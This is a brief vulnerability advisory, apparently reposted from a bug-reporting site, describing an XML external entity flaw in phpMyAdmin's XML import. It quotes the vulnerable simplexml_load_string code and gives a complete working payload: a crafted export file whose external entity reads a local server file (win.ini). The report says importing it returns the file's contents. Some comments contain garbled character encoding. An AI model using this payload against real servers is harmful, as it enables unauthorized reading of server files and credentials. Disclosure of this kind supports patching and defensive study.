phpMyAdmin Arbitrary File Read

`Hi  
  
80sec report this bug on wooyun,PhpMyadmin use a simplexml_load_string  
function to read xml from user input,this may be exploied to read files  
from the server or network  
  
in libraries/import/xml.php,some code like this  
  
  
/**  
  
* Load the XML string  
  
*  
  
* The option LIBXML_COMPACT is specified because it can  
  
* result in increased performance without the need to  
  
* alter the code in any way. It's basically a freebee.  
  
*/  
  
$xml = simplexml_load_string($buffer, "SimpleXMLElement", LIBXML_COMPACT);  
  
unset($buffer);  
  
  
  
/**  
  
* The XML was malformed  
  
*/  
  
if ($xml === FALSE) {  
  
so you just need to make a xml like this  
  
<?xml version="1.0" encoding="utf-8"?>  
  
<!DOCTYPE wooyun [  
  
<!ENTITY hi80sec SYSTEM "file:///c:/windows/win.ini">  
  
]>  
  
  
  
<pma_xml_export version="1.0" xmlns:pma="  
http://www.phpmyadmin.net/some_doc_url/">  
  
<!--  
  
- Structure schemas  
  
-->  
  
<pma:structure_schemas>  
  
<pma:database name="test" collation="utf8_general_ci"  
charset="utf8">  
  
<pma:table name="ts_ad">  
  
&hi80sec;  
  
</pma:table>  
  
</pma:database>  
  
</pma:structure_schemas>  
  
  
  
<!--  
  
- Êý¾Ý¿â: 'thinksns'  
  
-->  
  
<database name="thinksns">  
  
<!-- ±í ts_ad -->  
  
</database>  
  
</pma_xml_export>  
  
then import this xml in PhpMyAdmin,you will get the content you want.  
  
From:http://www.wooyun.org/bugs/wooyun-2010-03185  
  
:)  
`